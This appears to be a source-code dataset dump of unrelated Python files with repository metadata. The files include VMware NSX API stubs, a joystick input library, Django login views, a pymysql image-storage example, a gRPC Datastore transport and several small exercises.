def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _StatisticsStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
tier0_id,
locale_service_id,
l2vpn_id,
enforcement_point_path=None,
):
"""
:type tier0_id: :class:`str`
:param tier0_id: (required)
:type locale_service_id: :class:`str`
:param locale_service_id: (required)
:type l2vpn_id: :class:`str`
:param l2vpn_id: (required)
:type enforcement_point_path: :class:`str` or ``None``
:param enforcement_point_path: String Path of the enforcement point (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.AggregateL2VpnStatistics`
:return: com.vmware.nsx_policy.model.AggregateL2VpnStatistics
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'tier0_id': tier0_id,
'locale_service_id': locale_service_id,
'l2vpn_id': l2vpn_id,
'enforcement_point_path': enforcement_point_path,
})
class _PeerConfigStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'tier0_id': type.StringType(),
'locale_service_id': type.StringType(),
'l2vpn_id': type.StringType(),
'enforcement_point_path': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/tier-0s/{tier-0-id}/locale-services/{locale-service-id}/l2vpn-context/l2vpns/{l2vpn-id}/peer-config',
path_variables={
'tier0_id': 'tier-0-id',
'locale_service_id': 'locale-service-id',
'l2vpn_id': 'l2vpn-id',
},
query_parameters={
'enforcement_point_path': 'enforcement_point_path',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'AggregateL2VpnPeerConfig'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.peer_config',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _StatisticsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'tier0_id': type.StringType(),
'locale_service_id': type.StringType(),
'l2vpn_id': type.StringType(),
'enforcement_point_path': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/tier-0s/{tier-0-id}/locale-services/{locale-service-id}/l2vpn-context/l2vpns/{l2vpn-id}/statistics',
path_variables={
'tier0_id': 'tier-0-id',
'locale_service_id': 'locale-service-id',
'l2vpn_id': 'l2vpn-id',
},
query_parameters={
'enforcement_point_path': 'enforcement_point_path',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'AggregateL2VpnStatistics'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.statistics',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'PeerConfig': PeerConfig,
'Statistics': Statistics,
}
| [
"[email protected]"
] | |
c8cfea60f10bab3d2d252c18e5e0bdbc99706d03 | 2f898bb332097d11f321186207e94f6d156587f3 | /dsp2019/classe4_dft/generar_audio.py | f41a4c4171677ad77f1be4e998e728e9ab7e47bf | [
"MIT"
] | permissive | miltonsarria/teaching | ad2d07e9cfbfcf272c4b2fbef47321eae765a605 | 7a2b4e6c74d9f11562dfe34722e607ca081c1681 | refs/heads/master | 2022-01-05T05:58:13.163155 | 2019-05-02T20:45:46 | 2019-05-02T20:45:46 | 102,375,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 570 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from scipy.io.wavfile import read
from scipy.io.wavfile import write
import numpy as np
import matplotlib.pyplot as plt
fs=16e3
longitud = 2# sec
n=np.linspace(1./fs,longitud,fs*longitud);
F=400 #frecuencia fundamental
w=2*np.pi*F #frecuencia angular
Vm=1 #valor de amplitud de la onda
#generar onda sinusoidal pura
x=Vm*np.cos(w*n)
#definir un nombre y guardar el archivp
filename = 'ejemplo1.wav'
write(filename,fs,x)
#mostrar en una grafica la sinusoidal guardada
plt.plot(x)
plt.show()
| [
"[email protected]"
] | |
f7e3e1ceda275bc64213308ab21495cb7d97b19a | 8d2a124753905fb0455f624b7c76792c32fac070 | /pytnon-month02/month02-lvze-notes/day15-lvze/save_file.py | 9095c3857f57b6435b8db97a5bd1032e0fa61e98 | [] | no_license | Jeremy277/exercise | f38e4f19aae074c804d265f6a1c49709fd2cae15 | a72dd82eb2424e4ae18e2f3e9cc66fc4762ec8fa | refs/heads/master | 2020-07-27T09:14:00.286145 | 2019-09-17T11:31:44 | 2019-09-17T11:31:44 | 209,041,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | """
save_file.py
二进制文件存取示例
"""
import pymysql
# 连接数据库
db = pymysql.connect(user='root',
password = '123456',
database = 'stu',
charset='utf8')
# 获取游标 (操作数据库,执行sql语句,得到执行结果)
cur = db.cursor()
# 执行语句
# 存入图片
with open('gakki.jpg','rb') as f:
data = f.read()
sql = "insert into images values (1,%s,%s)"
cur.execute(sql,[data,'初恋'])
db.commit()
# 提取图片
sql = "select photo from images \
where comment='初恋'"
cur.execute(sql)
data = cur.fetchone()[0] #元组里面有一个数据
with open('gakki_get.jpg','wb') as f:
f.write(data)
# 关闭游标
cur.close()
# 关闭数据库
db.close()
| [
"[email protected]"
] | |
61fb603d132eda1ba08b4a29b00a1112cafcd207 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2890/58634/237718.py | 7875c0abb4bcd7b3b6440c09767567838f31d8cb | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | a = [int(i) for i in input().split(" ")]
n = a[0]
x = a[1]
y = a[2]
different_k = []
not_have_k = False #与原点的连线垂直于x轴,没有斜率的
for i in range(n):
b = [int(i) for i in input().split(" ")]
x1 = b[0] - x#移动坐标轴,把意大利炮放在原点
y1 = b[1] - y
if x1 == 0:
not_have_k = True
else:
if different_k.count(y1/x1) == 0:
different_k.append(y1/x1)
if not_have_k:
print(len(different_k)+1)
else:
print(len(different_k)) | [
"[email protected]"
] | |
bdecc3ccb4df935062f8509ec4904a6e1162f0a7 | 96c6273649417609f0f86df88e5e95ecd7e80d86 | /pyjoystick/interface.py | 51d162a614beefdfc9a6f2d3df4c3f902a035de8 | [
"MIT"
] | permissive | erjosito/pyjoystick | e311accb9e83d28f4325f799527270dfc3d49010 | 2b1639c17892904b191fe2ba42341a19d6f3b78e | refs/heads/master | 2023-08-31T15:19:15.019252 | 2021-10-14T19:07:49 | 2021-10-14T19:07:49 | 550,453,646 | 1 | 0 | MIT | 2022-10-12T19:48:08 | 2022-10-12T19:48:08 | null | UTF-8 | Python | false | false | 15,882 | py | from .stash import Stash
__all__ = ['KeyTypes', 'HatValues', 'Key', 'Joystick']
class KeyTypes:
"""Types of keys the controller could report (Axis, Button, Hat, Ball)."""
AXIS = "Axis"
BUTTON = "Button"
HAT = "Hat"
BALL = "Ball"
ALL_KEYTYPES = ','.join((AXIS, BUTTON, HAT, BALL))
@classmethod
def has_keytype(cls, keytype, key_types):
try:
if keytype == cls.ALL_KEYTYPES or str(keytype) in key_types:
return True
except (TypeError, ValueError, Exception):
pass
return False
class HatValues:
"""Have values and converters. Values are numbered like bit flags."""
HAT_CENTERED = 0
HAT_UP = 1
HAT_RIGHT = 2
HAT_DOWN = 4
HAT_LEFT = 8
HAT_RIGHTUP = HAT_UPRIGHT = 3
HAT_RIGHTDOWN = HAT_DOWNRIGHT = 6
HAT_LEFTUP = HAT_UPLEFT = 9
HAT_LEFTDOWN = HAT_DOWNLEFT = 12
ALL_HAT_VALUES = (HAT_CENTERED | HAT_UP | HAT_RIGHT | HAT_DOWN | HAT_LEFT |
HAT_UPRIGHT | HAT_DOWNRIGHT | HAT_UPLEFT | HAT_DOWNLEFT)
HAT_NAME_CENTERED = 'Centered'
HAT_NAME_UP = 'Up'
HAT_NAME_RIGHT = 'Right'
HAT_NAME_DOWN = 'Down'
HAT_NAME_LEFT = 'Left'
HAT_NAME_UPRIGHT = HAT_NAME_RIGHTUP = 'Up Right'
HAT_NAME_DOWNRIGHT = HAT_NAME_RIGHTDOWN = 'Down Right'
HAT_NAME_UPLEFT = HAT_NAME_LEFTUP = 'Up Left'
HAT_NAME_DOWNLEFT = HAT_NAME_LEFTDOWN = 'Down Left'
HAT_CONVERTER = {
HAT_CENTERED: HAT_NAME_CENTERED, HAT_UP: HAT_NAME_UP, HAT_RIGHT: HAT_NAME_RIGHT, HAT_DOWN: HAT_NAME_DOWN,
HAT_LEFT: HAT_NAME_LEFT, HAT_UPRIGHT: HAT_NAME_UPRIGHT, HAT_DOWNRIGHT: HAT_NAME_DOWNRIGHT,
HAT_UPLEFT: HAT_NAME_UPLEFT, HAT_DOWNLEFT: HAT_NAME_DOWNLEFT,
}
NAME_CONVERTER = {name: value for value, name in HAT_CONVERTER.items()}
HAT_TO_RANGE = {
HAT_CENTERED: (0, 0), HAT_NAME_CENTERED: (0, 0),
HAT_UP: (0, 1), HAT_NAME_UP: (0, 1),
HAT_RIGHT: (1, 0), HAT_NAME_RIGHT: (1, 0),
HAT_DOWN: (0, -1), HAT_NAME_DOWN: (0, -1),
HAT_LEFT: (-1, 0), HAT_NAME_LEFT: (-1, 0),
HAT_RIGHTUP: (1, 1), HAT_NAME_RIGHTUP: (1, 1),
HAT_RIGHTDOWN: (1, -1), HAT_NAME_RIGHTDOWN: (1, -1),
HAT_LEFTUP: (-1, 1), HAT_NAME_LEFTUP: (-1, 1),
HAT_LEFTDOWN: (-1, -1), HAT_NAME_LEFTDOWN: (-1, -1),
}
HAT_FROM_RANGE = {
(0, 0): HAT_CENTERED,
(0, 1): HAT_UP,
(1, 0): HAT_RIGHT,
(0, -1): HAT_DOWN,
(-1, 0): HAT_LEFT,
(1, 1): HAT_RIGHTUP,
(1, -1): HAT_RIGHTDOWN,
(-1, 1): HAT_LEFTUP,
(-1, -1): HAT_LEFTDOWN,
}
HAT_NAME_FROM_RANGE = {
(0, 0): HAT_NAME_CENTERED,
(0, 1): HAT_NAME_UP,
(1, 0): HAT_NAME_RIGHT,
(0, -1): HAT_NAME_DOWN,
(-1, 0): HAT_NAME_LEFT,
(1, 1): HAT_NAME_RIGHTUP,
(1, -1): HAT_NAME_RIGHTDOWN,
(-1, 1): HAT_NAME_LEFTUP,
(-1, -1): HAT_NAME_LEFTDOWN,
}
@classmethod
def convert_to_hat_name(cls, hat_value):
"""Return the given hat_value as a string name"""
return cls.HAT_CONVERTER.get(hat_value, str(hat_value))
@classmethod
def convert_to_hat_value(cls, hat_name):
"""Return the given hat_name as an integer value. If -1 is returned it is an invalid value."""
try:
value = int(hat_name)
except (TypeError, ValueError, Exception):
value = -1
return cls.NAME_CONVERTER.get(hat_name, value)
@classmethod
def as_range(cls, hat, default=None):
if default is None:
default = hat
return cls.HAT_TO_RANGE.get(hat, default)
@classmethod
def from_range(cls, hat, default=None):
if default is None:
default = hat
return cls.HAT_FROM_RANGE.get(hat, default)
@classmethod
def name_from_range(cls, hat, default=None):
if default is None:
default = hat
return cls.HAT_NAME_FROM_RANGE.get(hat, default)
class Key(object):
"""Key that the controller received. This stores the key type, value, and other properties to use."""
# Key Types
KeyTypes = KeyTypes
AXIS = KeyTypes.AXIS
BUTTON = KeyTypes.BUTTON
HAT = KeyTypes.HAT
BALL = KeyTypes.BALL
ALL_KEYTYPES = KeyTypes.ALL_KEYTYPES
has_keytype = staticmethod(KeyTypes.has_keytype)
# HAT Values (Guessing they are more bit flags than enums.)
HatValues = HatValues
HAT_CENTERED = HatValues.HAT_CENTERED
HAT_UP = HatValues.HAT_UP
HAT_RIGHT = HatValues.HAT_RIGHT
HAT_DOWN = HatValues.HAT_DOWN
HAT_LEFT = HatValues.HAT_LEFT
HAT_RIGHTUP = HAT_UPRIGHT = HatValues.HAT_UPRIGHT
HAT_RIGHTDOWN = HAT_DOWNRIGHT = HatValues.HAT_DOWNRIGHT
HAT_LEFTUP = HAT_UPLEFT = HatValues.HAT_UPLEFT
HAT_LEFTDOWN = HAT_DOWNLEFT = HatValues.HAT_DOWNLEFT
ALL_HAT_VALUES = HatValues.ALL_HAT_VALUES
HAT_NAME_CENTERED = HatValues.HAT_NAME_CENTERED
HAT_NAME_UP = HatValues.HAT_NAME_UP
HAT_NAME_RIGHT = HatValues.HAT_NAME_RIGHT
HAT_NAME_DOWN = HatValues.HAT_NAME_DOWN
HAT_NAME_LEFT = HatValues.HAT_NAME_LEFT
HAT_NAME_UPRIGHT = HAT_NAME_RIGHTUP = HatValues.HAT_NAME_UPRIGHT
HAT_NAME_DOWNRIGHT = HAT_NAME_RIGHTDOWN = HatValues.HAT_NAME_DOWNRIGHT
HAT_NAME_UPLEFT = HAT_NAME_LEFTUP = HatValues.HAT_NAME_UPLEFT
HAT_NAME_DOWNLEFT = HAT_NAME_LEFTDOWN = HatValues.HAT_NAME_DOWNLEFT
convert_to_hat_name = staticmethod(HatValues.convert_to_hat_name)
convert_to_hat_value = staticmethod(HatValues.convert_to_hat_value)
convert_to_hat_range = staticmethod(HatValues.as_range)
def __init__(self, keytype, number, value=None, joystick=None, is_repeat=False, override=False):
self.keytype = keytype
self.number = number
self.raw_value = None
self.joystick = joystick
self.is_repeat = is_repeat
self.override = override
self.set_value(value)
def get_hat_name(self):
"""Return the value as a HAT name."""
if self.keytype != self.HAT:
raise TypeError('The Key must be a HAT keytype in order to get the hat name.')
return self.convert_to_hat_name(self.raw_value)
def get_hat_range(self):
"""Return the key as a range (right[1]/left[-1], up[1]/down[-1])."""
if self.keytype != self.HAT:
raise TypeError('The Key must be a HAT keytype in order to get the hat name.')
return self.convert_to_hat_range(self.raw_value)
def get_proper_value(self):
"""Return the value between -1 and 1. Hat values act like buttons and will be 1 or 0.
Use get_hat_name to check the keytype.
"""
if self.raw_value is None:
return 0
elif self.raw_value > 1:
return 1
return self.raw_value
def get_value(self):
"""Return the value of the key"""
if self.raw_value is None:
return 0
return self.raw_value
def set_value(self, value):
"""Set the value of the key"""
self.raw_value = value
value = property(get_value, set_value)
def update_value(self, joystick=None):
"""Set this key's value from the set or given joystick's associated key value."""
if joystick is None:
joystick = self.joystick
try:
v = joystick.get_key(self).get_value()
self.value = v
except:
pass
def copy(self):
"""Create a copy of the key."""
return self.__class__(self.keytype, self.number, self.value, self.joystick,
is_repeat=False, override=self.override)
@classmethod
def to_keyname(cls, key):
"""Return this key as a string keyname.
* Format is "{minus}{keytype} {number}".
* Hat format is "{keytype} {number} {hat_name}"
Examples
* "Axis 0" - For Axis 0 with a positive or 0 value.
* "-Axis 1" - For an Axis Key that has a negative value and needs to be inverted.
* "Button 0" - Buttons wont have negative values
* "Hat 0 [Left Up]" - Hat values also give the key value as a hat name.
"""
prefix = ''
if key.value and key.value < 0:
prefix = '-'
if key.keytype == cls.HAT:
return '{}{} {} [{}]'.format(prefix, key.keytype, key.number, key.get_hat_name())
else:
return '{}{} {}'.format(prefix, key.keytype, key.number)
@classmethod
def from_keyname(cls, keyname, joystick=None):
"""Return a new key from the given keyname."""
# Remove any joystick name attached
keyname = str(keyname)
if ':' in keyname:
keyname = keyname.split(':', 1)[-1].strip()
# Split the keyname
keytype, number = keyname.split(' ', 1)
# Check if the keyname starts with a negative.
value = None
if keytype.startswith('-'):
value = -1
keytype = keytype[1:].strip()
# Check if the number has '['
if '[' in number:
number, hat_name = number.split('[', 1)
number = number.strip()
value = int(cls.convert_to_hat_value(hat_name.replace(']', '').strip()))
number = int(number)
return Key(keytype, number, value, joystick=joystick)
@property
def keyname(self):
return self.to_keyname(self)
@keyname.setter
def keyname(self, keyname):
new_key = self.from_keyname(keyname)
self.keytype = new_key.keytype
self.number = new_key.number
if self.value:
self.value = new_key.value
def __str__(self):
return self.to_keyname(self)
def __repr__(self):
if self.joystick:
return '<{module}.{name} {joystick}: {keyname} at {id}>'.format(
module=self.__module__, name=self.__class__.__name__, id=id(self),
joystick=self.joystick, keyname=self.keyname)
else:
return '<{module}.{name} {keyname} at {id}>'.format(
module=self.__module__, name=self.__class__.__name__, id=id(self),
joystick=self.joystick, keyname=self.keyname)
def __hash__(self):
return hash('{} {}'.format(self.keytype, self.number))
def __eq__(self, other):
try:
if other.keytype == self.keytype and other.number == self.number:
# Check if joysticks match if they are not None
if other.joystick is not None and self.joystick is not None:
return other.joystick == self.joystick
return True
return False
except:
pass
try:
return str(self) == str(other)
except:
return False
class Joystick(object):
@classmethod
def get_joysticks(cls):
"""Return a list of available joysticks."""
# return []
raise NotImplementedError
def __init__(self, *args, **kwargs):
super().__init__()
# Optional predefined variables (use with __new__)
self.joystick = getattr(self, 'joystick', None) # Internal joystick object
self.identifier = getattr(self, 'identifier', -1)
self.name = getattr(self, 'name', '')
self.numaxes = getattr(self, 'numaxes', -1)
self.numbuttons = getattr(self, 'numbuttons', -1)
self.numhats = getattr(self, 'numhats', -1)
self.numballs = getattr(self, 'numballs', -1)
self.axis = getattr(self, 'axis', Stash())
self.button = getattr(self, 'button', Stash())
self.hat = getattr(self, 'hat', Stash())
self.ball = getattr(self, 'ball', Stash())
self.keys = getattr(self, 'keys', Stash(self.axis + self.button + self.hat + self.ball))
self.deadband = getattr(self, 'deadband', 0.2)
self.init_keys()
def init_keys(self):
"""Initialize the keys."""
self.axis = Stash(Key(Key.AXIS, i, None, self) for i in range(self.get_numaxes()))
self.button = Stash(Key(Key.BUTTON, i, None, self) for i in range(self.get_numbuttons()))
self.hat = Stash(Key(Key.HAT, i, None, self) for i in range(self.get_numhats()))
self.ball = Stash(Key(Key.BALL, i, None, self) for i in range(self.get_numballs()))
self.keys = Stash(self.axis + self.button + self.hat + self.ball)
def is_available(self):
"""Return if this joystick is still active and available."""
raise NotImplementedError
def close(self):
"""Close the joystick."""
raise NotImplementedError
def get_key(self, key):
"""Return the key for the given key."""
key_attr = getattr(self, str(key.keytype).lower()) # self.axis, self.button, self.hat, or self.ball
return key_attr[key.number]
def get_key_value(self, key):
"""Return the current value of this joystick's key for the given key."""
return self.get_key(key).get_value()
def update_key(self, key):
"""Update the value for a given key."""
self.get_key(key).set_value(key.value)
def get_id(self):
"""Return the joystick id."""
return self.identifier
def get_name(self):
"""Return the name of the joystick."""
return self.name
def get_numaxes(self):
"""Return the number of axes."""
return self.numaxes
def get_axis(self, number):
"""Return the current value for the given axes."""
return self.axis[number].get_value()
def get_numbuttons(self):
"""Return the number of buttons."""
return self.numbuttons
def get_button(self, number):
"""Return the value for the given button number."""
return self.button[number].get_value()
def get_numhats(self):
"""Return the number of hats."""
return self.numhats
def get_hat(self, number):
"""Return the (hat [0], hat [1]) value for the given hat number."""
return self.hat[number].get_value()
def get_numballs(self):
"""Return the number of track balls."""
return self.numballs
def get_ball(self, number):
"""Return the current value for the given axes."""
return self.ball[number].get_value()
def get_deadband(self):
"""Return the deadband for this joystick axis."""
return self.deadband
def set_deadband(self, value):
"""Return the deadband for this joystick axis."""
self.deadband = value
def __eq__(self, other):
name, my_id, joystick = self.get_name(), self.get_id(), self.joystick
try:
return name == other.get_name() or my_id == other or (joystick == other.joystick and joystick is not None)
except:
pass
try:
is_id = not isinstance(other, bool) and my_id == other
return is_id or name == other or (joystick == other and joystick is not None)
except:
pass
return False
def __int__(self):
return self.get_id()
def __str__(self):
return self.get_name()
def __hash__(self):
return hash('{} {}'.format(self.identifier, self.name))
def __getstate__(self):
return {
'joystick': None,
'identifier': self.identifier,
'name': self.name,
'numaxes': self.numaxes,
'numbuttons': self.numbuttons,
'numhats': self.numhats,
'numballs': self.numballs,
'axis': self.axis,
'button': self.button,
'hat': self.hat,
'ball': self.ball,
'keys': self.keys,
'deadband': self.deadband
}
def __setstate__(self, state):
for k, v in state.items():
setattr(self, k, v)
| [
"[email protected]"
] | |
ce98326eec9e867cfa84bc1b3f0f2d96f6af855a | 8cadad50417345f84ce275d455f4d9d851adcfcb | /accounts/views.py | 77c71b57912235123ee133a106e9127927d80431 | [] | no_license | amirbigg/django-blog | b67427dc9b087937c91e62bead242690658f8584 | 23d6d47dd3e309fa736cd891654a09da18d08427 | refs/heads/master | 2023-04-28T17:35:00.298592 | 2022-02-11T18:15:47 | 2022-02-11T18:15:47 | 226,943,807 | 26 | 6 | null | 2023-04-21T21:28:17 | 2019-12-09T18:51:29 | Python | UTF-8 | Python | false | false | 1,452 | py | from django.shortcuts import render, redirect
from .forms import UserLoginForm, UserRegistrationForm
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.models import User
def user_login(request):
if request.method == 'POST':
form = UserLoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.success(request, 'you logged in successfully', 'success')
return redirect('blog:all_articles')
else:
messages.error(request, 'wrong username or password', 'warning')
else:
form = UserLoginForm()
return render(request, 'accounts/login.html', {'form':form})
def user_register(request):
if request.method == 'POST':
form = UserRegistrationForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
User.objects.create_user(cd['username'], cd['email'], cd['password1'])
messages.success(request, 'you registered successfully, now log in', 'success')
return redirect('accounts:user_login')
else:
form = UserRegistrationForm()
return render(request, 'accounts/register.html', {'form':form})
def user_logout(request):
logout(request)
messages.success(request, 'you logged out successfully', 'success')
return redirect('blog:all_articles') | [
"[email protected]"
] | |
6c47467fdc2e3ac450e09175b287eb9a071c66b8 | 4cc4d9d488939dde56fda368faf58d8564047673 | /test/vts/testcases/framework_test/SampleSl4aTest.py | 0b1133ebb0c19c335cf4b803840db478b2dc7418 | [] | no_license | Tosotada/android-8.0.0_r4 | 24b3e4590c9c0b6c19f06127a61320061e527685 | 7b2a348b53815c068a960fe7243b9dc9ba144fa6 | refs/heads/master | 2020-04-01T11:39:03.926512 | 2017-08-28T16:26:25 | 2017-08-28T16:26:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | #!/usr/bin/env python
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from vts.runners.host import base_test
from vts.runners.host import test_runner
from vts.utils.python.controllers import android_device
class SampleSl4aTest(base_test.BaseTestClass):
"""An example showing making SL4A calls in VTS."""
def setUpClass(self):
self.dut = self.registerController(android_device)[0]
def testToast(self):
"""A sample test controlling Android device with sl4a. This will make a
toast message on the device screen."""
logging.info("A toast message should show up on the devce's screen.")
self.dut.sl4a.makeToast("Hello World!")
if __name__ == "__main__":
test_runner.main()
| [
"[email protected]"
] | |
c0df06b16069e147b3de2e0d270c87285e2aa0b6 | 41c5267c5b1bf6cf726dfce7f203828ab58280cc | /addons/speakers/search_indexes.py | ea8cdc9aa44bee11e7a61be39a41760d719cc403 | [] | no_license | fbates/tendenci-site | 7484616ec13a07f05be3a7a9663bca6d6800360b | 8eb0bcd8e3269e92b505e8db4f81b35442fb4ac4 | refs/heads/master | 2021-01-11T10:55:56.171005 | 2012-11-15T18:15:21 | 2012-11-15T18:15:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | from haystack import indexes
from haystack import site
from tendenci.core.perms.indexes import TendenciBaseSearchIndex
from addons.speakers.models import Speaker
class SpeakerIndex(TendenciBaseSearchIndex):
name = indexes.CharField(model_attr='name')
company = indexes.CharField(model_attr='company', null=True)
position = indexes.CharField(model_attr='position', null=True)
track = indexes.CharField(model_attr='track', null=True)
ordering = indexes.IntegerField(model_attr='ordering', null=True)
site.register(Speaker, SpeakerIndex)
| [
"[email protected]"
] | |
587d324910fd7515c01c9051e7f77212a24b4987 | 5d302c38acd02d5af4ad7c8cfe244200f8e8f877 | /Array/1002. Find Common Characters(Easy).py | a9cdff36a75c8b1badf3cf74b7bdd55fe3ad92a2 | [] | no_license | nerohuang/LeetCode | 2d5214a2938dc06600eb1afd21686044fe5b6db0 | f273c655f37da643a605cc5bebcda6660e702445 | refs/heads/master | 2023-06-05T00:08:41.312534 | 2021-06-21T01:03:40 | 2021-06-21T01:03:40 | 230,164,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | class Solution:
def commonChars(self, A: List[str]) -> List[str]:
result = [];
chars = []
count = 0;
for char in A[0]:
chars.append(char);
for char in chars:
for i in range(1, len(A)):
if char in A[i]:
A[i] = A[i].replace(char, '', 1);
count += 1;
if count == len(A) - 1:
result.append(char);
count = 0;
return result;
##class Solution:
## def commonChars(self, A: List[str]) -> List[str]:
## answer = []
## sorted(A)
## for i,val in enumerate(A[0]):
## if all(val in string for string in A[1:]):
## for i in range(1,len(A)):
## A[i] = A[i].replace(val,'',1)
## answer.append(val)
## return answer | [
"[email protected]"
] | |
f466d9cc297956ba34da47d5efb40d14454f37a6 | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/datastore/v1/datastore-v1-py/google/cloud/datastore_v1/services/datastore/transports/grpc.py | 19509f59032d036f4b60e29fbfecef80da014254 | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,280 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.datastore_v1.types import datastore
from .base import DatastoreTransport, DEFAULT_CLIENT_INFO
class DatastoreGrpcTransport(DatastoreTransport):
"""gRPC backend transport for Datastore.
Each RPC normalizes the partition IDs of the keys in its
input entities, and always returns entities with keys with
normalized partition IDs. This applies to all keys and entities,
including those in values, except keys with both an empty path
and an empty or unset partition ID. Normalization of input keys
sets the project ID (if not already set) to the project ID from
the request.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(self, *,
host: str = 'datastore.googleapis.com',
credentials: ga_credentials.Credentials = None,
